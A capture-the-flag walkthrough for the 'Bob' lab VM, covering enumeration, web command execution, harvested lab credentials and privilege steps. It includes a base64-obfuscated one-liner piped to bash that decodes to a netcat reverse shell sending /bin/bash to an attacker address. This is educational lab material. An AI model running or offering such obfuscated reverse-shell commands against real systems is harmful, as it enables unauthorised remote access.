Bob
Description ⤵️
💡 Difficulty: Beginner/Intermediate → Bob
Bob is my first CTF VM that I have ever made so be easy on me if it is not perfect.
The Milburg Highschool Server has just been attacked, the IT staff have taken down their windows server and are now setting up a linux server running Debian. Could there a few weak points in the new unfinished server?
—
Your Goal is to get the flag in /
Hints: Remember to look for hidden info/files
## Changelog v1.0 ~ 2018-03-07 v1.0.1 ~ 2018-03-09
Let’s find the IP Address first »
1
IP : 10.0.2.18
Port Scan Results ➡️
1
2
3
OPEN PORTS >
80 HTTP (Enumeration Further !)
25468 SSH (Hidding the ssh port from changing it is good stategy !)
Web Enumeration ⤵️
Lets check the robots.txt file →
lets try to get the output now → for command : id
Lets try to generate reverse shell from it →
Now let is try the reverse shell Now →
1
2
command ->
**echo** "bmMgMTAuMC4yLjEwIDQ0NDQgLWUgL2Jpbi9iYXNoCg==" **|** base64 -d **|** **bash**
Look what I found →
1
2
jc : Qwerty
seb : T1tanium_Pa$$word_Hack3rs_Fear_M3
1
elliot : theadminisdumb
After very much enumeration of directories I got this folder and The secret part was the HARPOCRATES
Harpocrates was the Greek god of silence, secrets, and confidentiality.
Now for extracting this I used this parapharase →
1
2
And I got this credential →
bob : b0bcat_
Lets see how bob can lead us to root —>
If you have any questions or suggestions, please leave a comment below. Thank You !